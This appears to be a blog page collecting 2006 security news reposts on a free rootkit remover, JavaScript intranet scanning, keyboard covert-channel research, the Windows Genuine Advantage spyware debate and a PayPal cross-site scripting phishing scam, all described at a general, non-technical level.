Sophos Offers Free Rootkit Detection Tool

There’s a new free tool to help PC users root out rootkits. Called Sophos Anti-Rootkit, the software from Sophos will detect and remove both known and unknown rootkits, and it will also warn system administrators if removing the software might harm operating system integrity.

Rootkits are a collection of tools used by hackers to gain administrative privileges on compromised machines. They are typically used to help hide other forms of malware–keyloggers or Trojan horse programs, for example–from antivirus software.

Rootkits Hit the Big Time Late last year, Sony BMG Music Entertainment helped to make rootkit a household word, after the company was forced to recall millions of CDs that used these cloaking techniques to hide its copy protection software. Sony’s rootkit, which was installed when customers tried to play CDs, actually compromised PC security. Hackers eventually released malicious software that used Sony’s software to hide itself on a PC.

Sophos Anti-Rootkit works with the Windows NT, 2000, XP, and Windows Server 2003 operating systems. The software features a graphical interface to help guide users through the process of detecting and removing the malicious software.

Since the Sony fiasco, the security industry has paid more attention to the rootkit problem and there are now a number of free utilities designed to identify this type of software. Other tools include RootkitRevealer, GMER and IceSword.

http://www.pcworld.com/article/126897-1/article.html?tk=nl_dnxnws

Posted in Internet, Privacy, Security | No Comments

Detecting, Analyzing, and Exploiting Intranet Applications using JavaScript

Imagine visiting a blog on a social site or checking your email on a portal like Yahoo’s Webmail. While you are reading the Web page, JavaScript code is downloaded and executed by your Web browser. It scans your entire home network, detects and determines your Linksys router model number, and then sends commands to the router to turn on wireless networking and turn off all encryption. Now imagine that this happens to 1 million people across the United States in less than 24 hours.

This scenario is no longer one of fiction.

• Click here to view the entire article
• Click here for proof of concept

Source: http://www.spidynamics.com/spilabs/education/articles/JS-portscan.html

Posted in Internet, Security | No Comments

Could Your Keyboard Spy on You?

Researchers say that small devices called “JitterBugs” could piggyback onto network connections to discreetly send passwords and other sensitive data over the Internet.

Like the current keylogger hardware used by the FBI and criminals alike to record passwords and other data, JitterBugs are small devices that attach to a keyboard and record what users type. Unlike current keyloggers, which store the data to internal memory, JitterBugs do not have to be retrieved before captured data can be read.

Although no such device has been found “in the wild” yet, researchers have developed a working prototype, and they postulate that similar ideas may have already been used in unnoticed attacks.

Researchers Theorize In a paper titled “Keyboards and Covert Channels,” University of Pennsylvania grad students explain that the device could encode data in keystrokes by introducing an extra delay between when a key is pressed and when the keyboard tells the computer that the key has been pressed. (Read the paper in PDF format.)

In applications such as telnet and remote desktop, a packet is sent every time a user presses a key. By causing calculated “jitters” in keyboard input while such a program is running, a JitterBug could slightly delay data sent over the network. Certain amounts of delay could represent a 1 or a 0 in each packet that is linked to keyboard use, allowing an attacker to send secret information in otherwise innocuous data without modifying software or initiating any new connections.

Although 1 bit per packet is not a great deal of space, an application like telnet could send enough packets to transmit a password or another small, important piece of data.

To intercept this data, a spy would need to use a packet sniffer to intercept a connection from the target computer. This would require that the attacker have access to a network somewhere between the victim and the victim’s destination–not a trivial goal, but probably easier than attaching the JitterBug in the first place.

Even if the connection were encrypted, data encoded in the delays would likely be visible to an attacker. Although additional delays could ruin the careful pattern introduced by the JitterBug, the device has some level of tolerance for this issue.

Worked Great in Tests Researchers say that in tests, the JitterBug was able to transmit data from the University of Pennsylvania to the National University of Singapore fairly reliably.

Researchers believe that such devices could pose a security threat not only because they are difficult to detect and they work across a wide variety of software and hardware, but also because they could be inconspicuously deployed on a large scale.

In what the paper’s authors term a “supply chain attack,” manufacturers would build a JitterBug into their keyboards. Such a vulnerability would be extremely difficult to detect–neither the keyboard nor the victim’s computer would appear to be doing anything unusual–but anyone who knew of the devices could decode the data they sent, getting backdoor access to thousands of computers.

This threat, however far-fetched, seems particularly relevant in light of the U.S. government’s decision in May use computers built by Lenovo only for processing unclassified data. The Chinese government owns 28 percent of Lenovo, information that sparked fears of espionage. As it turns out, numerous keyboards are also manufactured in China.

http://www.pcworld.com/article/126680-1/article.html?tk=nl_dnxnws

Posted in Hardware, Internet, Privacy | No Comments

Does Microsoft’s Windows Genuine Advantage Program Qualify as Spyware?

If it looks like spyware, acts like spyware, and transmits information like spyware–it’s practically spyware, say some antispyware makers of the antipiracy features in Microsoft’s controversial Windows Genuine Advantage (WGA) program.

Other antispyware firms aren’t so concerned. “Microsoft has every right to protect itself from piracy,” says J.J. Schoch, director of marketing at Panda Software.

Generally, spyware is defined as unwanted software that collects information about a computer user and/or the PC itself and transmits it back to the software publisher without informed consent by the computer user.

The WGA antipiracy program works in conjunction with Windows Update to check whether the Windows operating system on a machine has a valid license. Two class-action lawsuits have been filed against Microsoft in recent weeks alleging that WGA is spyware.

Background

When introduced last year, WGA, which checks a user’s copy of Windows XP to ensure it is not counterfeit or pirated, ran only on Windows-based PCs when a user installed the company’s Automatic Updates feature.

In April, Microsoft updated WGA, which is still a pilot program, with a Notifications tool that checked the legitimacy of Windows on a system, regardless of whether the Update services were being used. Microsoft agreed to revise Notifications in late June. The company now says the software will check only periodically (not daily) as to whether a version of Windows is genuine.

For more background on WGA, WGA Notifications, Microsoft updates to the program, information on the wording of the software’s EULA agreement, and several ways to remove the WGA Notifications tool, read PC World Staff Editor Erik Larkin’s take on these topics.

Firewall Leak Tester also offers a download that should remove the WGA Notifications tool from your PC.

Pros and Cons

Some antispyware vendors say controversial features of the WGA service are prompting them to consider putting it on their companies’ spyware blacklists, while other firms in the same business say recent hysteria over the program and lawsuits like the one filed in Seattle are without merit.

“WGA was indistinguishable from other seedy spyware firms in the Caribbean that steal data off your PC without proper permissions,” says Eric Howes, director of malware research at antispyware software maker Sunbelt Software. The firm does not currently classify WGA as spyware, but Howes says a change in status for WGA is under consideration. He acknowledges that Microsoft has since responded to the public outcry and done a better job of informing consumers about what WGA is and what information it collects.

Panda’s Schoch, on the other hand, says that the consumer uproar over WGA is somewhat confusing to him. He points out that the same people who don’t trust Microsoft’s WGA features are willing to entrust large amounts of Microsoft programs with personal data. “After they’ve trusted Windows with their personal e-mail and tax information, now they are worried about an innocent file check over the Internet?” he asks.

Microsoft acknowledges that WGA collects hardware and software data but maintains that the data is used only to verify that one copy of an OS has been registered on one computer.

Bad Guys Getting Involved

Schoch points out some cybercrooks are now distributing a worm masked as Microsoft’s WGA through America Online’s popular AIM instant messaging service. These are the threats that currently top his list of WGA concerns.

Panda and other security firms also are warning the public of the worm that is disguising itself as WGA features in Windows. The worm is capable of disabling a PC’s firewall and leaving the system vulnerable to outside control.

Other Concerns About WGA

Other WGA-focused security concerns come from antispyware firm Webroot Software, which says that systems that do not pass WGA validation are not eligible for important Windows security updates and Microsoft security features like Windows’ firewall.

“Pirated or not, a computer that is blocked from security updates and features makes the entire Internet more dangerous for all,” says Vinay Goel, vice president of worldwide marketing. That’s because cybercrooks can more easily exploit nonsecure PCs to distribute spam, viruses, and worms and also to carry out cyberattacks.

In an informal test running an unvalidated version of Windows XP Pro, PC World could not update a test PC while using Windows Update to download the Windows security update Service Pack 2.

An antispyware expert for SurfControl says that the practice of having programs make stealthy communications back to software publishers is here to stay and will only grow more prevalent as software continues to be sold as a service rather than a shrink-wrap software product.

“Programs need to communicate back home, whether it’s for a software update, patch, upgrade, or to check to make sure that the version being used is bought and paid for,” says Jim Murphy, SurfControl’s vice president of product marketing.

Better Communication Helpful

The one area in which antispyware firms are in agreement is that Microsoft implemented WGA poorly, and has not done a good job of obtaining the clear consent of its users.

Sunbelt’s Howes gives Microsoft a grade of D- when it comes to obtaining users’ consent for WGA. He contends that by Microsoft’s own spyware definitions in its antispyware software Windows Defender, WGA would be considered spyware. “Microsoft needs to realize the rules also apply to Microsoft,” Howes says.

A spokesperson for antispyware vendor Seriniti agrees. Lawrence Phipps says Seriniti doesn’t consider WGA spyware, but says that “if it walks like a duck, and talks like a duck, you might as well call it a duck.”

http://www.pcworld.com/news/article/0,aid,126387,tk,nl_dnxnws,00.asp

Posted in Privacy, Windows | No Comments

PayPal Security Flaw allows Identity Theft

A security flaw in the PayPal web site is being actively exploited by fraudsters to steal card numbers and other personal information belonging to PayPal users. The issue was reported to Netcraft today via our anti-phishing toolbar. The scam works quite convincingly, by tricking users into accessing a URL hosted on the genuine PayPal web site. The URL uses SSL to encrypt information transmitted to and from the site, and a valid 256-bit SSL certificate is presented to confirm that the site does indeed belong to PayPal; however, some of the content on the page has been modified by the fraudsters via a cross-site scripting technique (XSS).

When the victim visits the page, they are presented with a message that has been ‘injected’ onto the genuine PayPal site that says, “Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center.” After a short pause, the victim is then redirected to an external server, which presents a fake PayPal Member log-In page. At this crucial point, the victim may be off guard, as the paypal.com domain name and SSL certificate he saw previously are likely to make him realise he has visited the genuine PayPal web site ? and why would he expect PayPal to redirect him to a fraudulent web site?

If the victim logs in via the fake login page, their PayPal username and password is transmitted to the fraudsters and they are subsequently presented with another page which requests them to enter further details to remove limits on the access of their account. Information requested includes social security number, credit card number, expiration date, card verification number and ATM PIN. The server currently running the scam is hosted in Korea and is accessed via a hex-encoded IP address. The Netcraft Toolbar already protects PayPal users by blocking access to this site.

UPDATE: Paypal has now addressed this vulnerability. A company spokesman said Paypal is working with the Internet service provider that hosts the malicious site to get it shut down, and does not yet know how many people may have fallen victim to the scam.

http://news.netcraft.com/archives/2006/06/16/paypal_security_flaw_allows_identity_theft.html

Posted in Internet, Privacy | No Comments